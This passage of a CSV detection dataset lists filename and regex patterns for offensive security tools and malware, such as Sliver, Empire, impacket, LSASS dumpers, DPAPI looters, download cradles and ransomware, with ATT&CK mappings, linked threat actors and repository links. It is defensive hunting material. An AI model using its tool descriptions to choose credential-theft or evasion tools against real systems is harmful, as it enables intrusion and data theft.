- COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","6746" "*/DoubleDrive.git*",".{0,1000}\/DoubleDrive\.git.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - 
TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","6747" "*/DoubleDrive-main.zip*",".{0,1000}\/DoubleDrive\-main\.zip.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","6748" "*/DoUCMe.git*",".{0,1000}\/DoUCMe\.git.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","1","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","6749" "*/download/linpeas.sh*",".{0,1000}\/download\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","6752" "*/download/LsassDumping/*",".{0,1000}\/download\/LsassDumping\/.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","1","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","6753" "*/download/v*/sliver-client_linux*",".{0,1000}\/download\/v.{0,1000}\/sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - 
T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","6755" "*/download/v*/sliver-client_macos*",".{0,1000}\/download\/v.{0,1000}\/sliver\-client_macos.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","6756" "*/download/v*/sliver-client_macos*",".{0,1000}\/download\/v.{0,1000}\/sliver\-client_macos.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","6757" "*/download/v1.0/payload.dll*",".{0,1000}\/download\/v1\.0\/payload\.dll.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - 
T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","6758" "*/download/v1.1.0/pspy32*",".{0,1000}\/download\/v1\.1\.0\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","6759" "*/download/v1.1.0/pspy64*",".{0,1000}\/download\/v1\.1\.0\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","6760" "*/download/v1.2.0/pspy32*",".{0,1000}\/download\/v1\.2\.0\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","6761" "*/download/v1.2.1/pspy32*",".{0,1000}\/download\/v1\.2\.1\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","6762" "*/download/v1.2.1/pspy64*",".{0,1000}\/download\/v1\.2\.1\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","6763" 
"*/Download:Cradle.js*",".{0,1000}\/Download\:Cradle\.js.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","6764" "*/Download_Cradles.hta*",".{0,1000}\/Download_Cradles\.hta.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","6765" "*/Download_Cradles.ps1*",".{0,1000}\/Download_Cradles\.ps1.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","6766" "*/Download-Cradles.cmd*",".{0,1000}\/Download\-Cradles\.cmd.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","6767" "*/downloadexec.lua*",".{0,1000}\/downloadexec\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - 
T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","6768" "*/Downloads/Keylogger.txt*",".{0,1000}\/Downloads\/Keylogger\.txt.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","6769" "*/Downloads/keypress.log*",".{0,1000}\/Downloads\/keypress\.log.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","6770" "*/download-stager.js*",".{0,1000}\/download\-stager\.js.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. 
It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","10","1461","206","2025-03-25T03:30:16Z","2020-03-09T05:48:58Z","6772" "*/dpap-brute.nse*",".{0,1000}\/dpap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6773" "*/Dpapi.ps1*",".{0,1000}\/Dpapi\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","6774" "*/dpapi.py*",".{0,1000}\/dpapi\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6775" "*/dpapi_domain_backupkey.py*",".{0,1000}\/dpapi_domain_backupkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6776" "*/dpapi_masterkey.py*",".{0,1000}\/dpapi_masterkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6777" "*/DPAPImk2john.py*",".{0,1000}\/DPAPImk2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6778" "*/dpat.py*",".{0,1000}\/dpat\.py.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - 
T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","6779" "*/dpipe.sh*",".{0,1000}\/dpipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","N/A","1","67","29","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z","6780" "*/dpkg/info/tor.list*",".{0,1000}\/dpkg\/info\/tor\.list.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","6781" "*/dploot.git*",".{0,1000}\/dploot\.git.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","6782" "*/DragonCastle.git*",".{0,1000}\/DragonCastle\.git.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","6783" "*/DragonCastle.pdb*",".{0,1000}\/DragonCastle\.pdb.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL 
Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","6784" "*/dragoncastle.py*",".{0,1000}\/dragoncastle\.py.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","6785" "*/D-RAT.exe*",".{0,1000}\/D\-RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6786" "*/drda-brute.nse*",".{0,1000}\/drda\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6787" "*/drda-info.nse*",".{0,1000}\/drda\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6788" "*/DReverseProxy.git*",".{0,1000}\/DReverseProxy\.git.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","6789" "*/DriverDump.exe*",".{0,1000}\/DriverDump\.exe.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6790" "*/Drones/SleepDialogue.razor*",".{0,1000}\/Drones\/SleepDialogue\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6791" "*/drop-sc.py*",".{0,1000}\/drop\-sc\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6799" "*/DRSAT.exe*",".{0,1000}\/DRSAT\.exe.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","1","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","6800" "*/DRSAT.git*",".{0,1000}\/DRSAT\.git.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. 
attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","1","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","6801" "*/DRSAT-0.2.zip*",".{0,1000}\/DRSAT\-0\.2\.zip.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","1","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","6802" "*/drunkpotato*",".{0,1000}\/drunkpotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6803" "*/Drupwn*",".{0,1000}\/Drupwn.{0,1000}","offensive_tool_keyword","Drupwn","Drupal Security Scanner to perform enumerations on Drupal-based web applications.","T1190 - T1195 - T1200 - T1210 - T1211 - T1212 - T1213 - T1221 - T1222","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/immunIT/drupwn","1","0","#linux","N/A","N/A","7","601","131","2020-11-04T13:43:29Z","2018-04-04T15:13:27Z","6804" "*/DSInternals.psd1*",".{0,1000}\/DSInternals\.psd1.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","1","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","6805" "*/dsniff.c*",".{0,1000}\/dsniff\.c.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. SymantecpcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. 
dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","#linux","N/A","N/A","3","208","47","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z","6806" "*/dsniff.services*",".{0,1000}\/dsniff\.services.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. 
full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","#linux","N/A","N/A","3","208","47","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z","6807" "*/DUBrute.git*",".{0,1000}\/DUBrute\.git.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","1","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","6808" "*/DuckDuckC2.git*",".{0,1000}\/DuckDuckC2\.git.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","N/A","10","10","74","6","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z","6815" "*/ducky.py",".{0,1000}\/ducky\.py","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1101","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 